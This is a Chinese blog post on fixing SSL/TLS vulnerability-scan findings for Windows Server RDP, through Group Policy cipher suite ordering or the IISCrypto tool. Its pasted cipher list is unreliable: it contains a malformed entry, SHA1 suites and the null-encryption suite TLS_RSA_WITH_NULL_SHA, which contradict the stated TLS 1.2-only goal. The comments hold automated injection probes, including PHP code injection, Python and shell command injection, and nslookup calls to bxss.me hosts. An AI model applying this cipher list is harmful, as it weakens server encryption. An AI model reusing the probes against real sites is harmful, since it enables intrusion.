Windows-RDP-SSL漏洞

说明

Windows server 2008或2012远程桌面服务SSL加密默认是开启的,且有默认的CA证书。由于SSL/ TLS自身存在漏洞缺陷,当开启远程桌面服务,使用漏洞扫描工具扫描,发现存在SSL/TSL漏洞。本方案仅试用于Windows RDP 远程桌面服务扫描存在ssl相关漏洞,测试以下漏洞均可修复。

  • SSL/TLS协议信息泄露漏洞(CVE-2016-2183)【原理扫描】
  • SSL/TLS RC4 信息泄露漏洞(CVE-2013-2566)【原理扫描】
  • SSL/TLS 受诫礼(BAR-MITZVAH)攻击漏洞(CVE-2015-2808)【原理扫描】

测试环境

  • Windows Server 2008:默认配置无漏洞,如果存在可通过此方案尝试修复。
  • Windows Server 2012: 存在此漏洞,通过本方案可进行修复。

步骤

方案一、修改加密套件顺序

1.以管理员身份运行PowerShell。

2.运行gpedit.msc,打开“本地组策略编辑器”。
gpedit.msc

3.打开“本地组策略编辑器=>计算机配置=>管理模板=>网络=>SSL配置设置”, 在“SSL密码套件顺序”选项上,右键“编辑”。

4.在“SSL密码套件顺序”选在“已启用(E)” ,在“SSL密码套件”下修改SSL密码套件算法,仅保留TLS 1.2 SHA256 和 SHA384 密码套件、TLS 1.2 ECC GCM 密码套件。
删除原所有,并将以下代码粘贴至此处。

TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256_P256,TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256_P384,TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256_P521,TLS_ECDHE_ECDSA,WITH_AES_256_GCM_SHA384_P384,TLS_ECDHE_ECDSA_WITH_AES_256_GCM_SHA384_P521,TLS_RSA_WITH_AES_128_CBC_SHA256,TLS_RSA_WITH_AES_256_CBC_SHA256,TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA256_P256,TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA256_P384,TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA256_P521,TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA384_P256,TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA384_P384,TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA384_P521,TLS_ECDHE_ECDSA_WITH_AES_128_CBC_SHA256_P256,TLS_ECDHE_ECDSA_WITH_AES_128_CBC_SHA256_P384,TLS_ECDHE_ECDSA_WITH_AES_128_CBC_SHA256_P521,TLS_ECDHE_ECDSA_WITH_AES_256_CBC_SHA384_P384,TLS_ECDHE_ECDSA_WITH_AES_256_CBC_SHA384_P521,TLS_DHE_DSS_WITH_AES_128_CBC_SHA256,TLS_DHE_DSS_WITH_AES_256_CBC_SHA256,TLS_RSA_WITH_NULL_SHA,TLS_RSA_WITH_AES_128_CBC_SHA,TLS_DHE_DSS_WITH_AES_128_CBC_SHA

修改后,点击“应用”、“确定”,即可。

5.重启服务器进行验证。

方案二、利用IISCrypto进行一键优化

部分机器修改SSL加密套件顺序后无法正常启动远程桌面协议,可通过此方案进行修复。
1.通过以下地址下载IISCrypto。
https://www.nartac.com/Downloads/IISCrypto/IISCrypto.exe
2.双击运行此程序,选择Best Practices,再选择Apply即可。

3.重启服务器进行验证。

验证

加固前

加固后

参考地址

https://www.cnblogs.com/xyb0226/p/14205536.html

发表评论

您的电子邮箱地址不会被公开。

评论(11)

  • 匿名用户 2022年3月3日 上午2:49

    555

  • 匿名用户 2022年3月3日 上午2:49
  • 匿名用户 2022年3月3日 上午2:49

    )

  • 匿名用户 2022年3月3日 上午2:50

    ;assert(base64_decode(‘cHJpbnQobWQ1KDMxMzM3KSk7’));

  • 匿名用户 2022年3月3日 上午2:50

    <!–

  • 匿名用户 2022年3月3日 上午2:51

    555′”()&%gGEz(9746)

  • 匿名用户 2022年3月3日 上午2:51

    str(__import__(‘time’).sleep(9))+__import__(‘socket’).gethostbyname(‘hitiqaxmolmgm24534.’+’bxss.me’)

  • 匿名用户 2022年3月3日 上午2:51

    |echo wrmpvz$()\ zkddwo\nz^xyu||a #’ |echo wrmpvz$()\ zkddwo\nz^xyu||a #|” |echo wrmpvz$()\ zkddwo\nz^xyu||a #

  • 匿名用户 2022年3月3日 上午2:51

    &(nslookup hiticbljkgdll7914f.bxss.me||perl -e “gethostbyname(‘hiticbljkgdll7914f.bxss.me’)”)&’\”`0&(nslookup hiticbljkgdll7914f.bxss.me||perl -e “gethostbyname(‘hiticbljkgdll7914f.bxss.me’)”)&`’

  • 匿名用户 2022年3月3日 上午2:52

    `(nslookup hitznvoeapfqo44f9c.bxss.me||perl -e “gethostbyname(‘hitznvoeapfqo44f9c.bxss.me’)”)`